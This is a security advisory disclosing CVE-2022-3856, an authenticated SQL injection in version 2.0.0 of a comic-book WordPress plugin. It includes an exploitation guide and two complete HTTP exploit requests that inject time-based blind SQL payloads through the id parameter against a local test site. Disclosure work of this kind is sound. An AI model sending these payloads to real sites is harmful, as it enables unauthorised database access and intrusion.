comicbookmanagementsystemweeklypicks 2.0.0 WordPress plug-in SQL injection
Vulnerability Metadata
| Key | Value |
|---|---|
| Date of Disclosure | November 14 2022 |
| Affected Software | comicbookmanagementsystemweeklypicks |
| Affected Software Type | WordPress plugin |
| Version | 2.0.0 |
| Weakness | SQL Injection |
| CWE ID | CWE-89 |
| CVE ID | CVE-2022-3856 |
| CVSS 3.x Base Score | 7.2 |
| CVSS 2.0 Base Score | n/a |
| Reporter | Kunal Sharma, Daniel Krohmer |
| Reporter Contact | k_sharma19@informatik.uni-kl.de |
| Link to Affected Software | https://wordpress.org/plugins/comicbookmanagementsystemweeklypicks/ |
| Link to Vulnerability DB | https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3856 |
Vulnerability Description
The id GET query parameter in comicbookmanagementsystemweeklypicks 2.0.0 is vulnerable to SQL injection. An authenticated attacker may abuse the "Get By ID" functionality in getByID function inside class.cbms_weekly_picks.php. This leads to a threat actor crafting a malicious GET request.
Exploitation Guide
Login as admin user. This attack requires at least admin privileges.
Go to CBMS Weekly Picks on the WordPress site dashboard.
Click Edit button on the CBMS Weekly Picks page.
Clicking Edit triggers the vulnerable request, id is the vulnerable query parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by un-sanitized user input of id at line 105 in ./class.cbms_weekly_picks_admin_panel.php. Subsequently, the id parameter is passed on through a function call cbms_weekly_picks::getByID.
At lines 145-149 in ./class.cbms_weekly_picks.php the database query call on $id leads to SQL injection.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below:
Exploit 1:
GET /wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(3)))hlAf) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=cbms_weekly_picks_admin&action
Connection: close
Cookie: wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666719945%7CkYQE4qEPQaE7o1mSvO8LCxPWzpUJp2fp1QC6sLf6Lcs%7C984a2ce652448b9e0465ae1b0536746994a789ecc1bdc10d0438ecbe3653158f; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666719945%7CkYQE4qEPQaE7o1mSvO8LCxPWzpUJp2fp1QC6sLf6Lcs%7Ccadb837c5bdb412507a39edbcd908e9517dc6bcfdb01cda0035695820708e348; wp-settings-8=libraryContent%3Dbrowse; wp-settings-time-8=1666547145
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Exploit 2:
POST /wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1
Content-Type: multipart/form-data; boundary=---------------------------19015747673015629704320873707
Content-Length: 733
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1667272743%7CegMjuEZ9uCiOZbWztcn8dAKOmdkx5cNRjmbBsB0gsZt%7C6bab0ad6332fd68b325e0aeac53b8fed629c533c6b023996cee39389ed2bb1ca; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666659596; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1667272743%7CegMjuEZ9uCiOZbWztcn8dAKOmdkx5cNRjmbBsB0gsZt%7C9696de66644ba76e51bfa9f6d81ad7205378a435b734a90bf00a0823ed7b5c03
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="id"
2 AND (SELECT 7741 FROM (SELECT(SLEEP(10)))hlAf)
-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="imagefile"; filename="comicbookmanagementsystemweeklypicks_2_step-9.png"
Content-Type: image/png
PNG
���
IHDR��õ��É���pQ��� pHYs��Ä��Ä+�� �IDATxì½{|×uï»83
0Ààý"@�A¤ J"eÊeQV,?äå¡øÄmìÖé#Nô4Í9MrÛ¦?öéi{¶¹çÄM÷ÚmíرFòCV$[-J¢(" "( ÞOâ1
Ì÷ð�
-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="update_picks"
Update Weekly Picks
-----------------------------19015747673015629704320873707--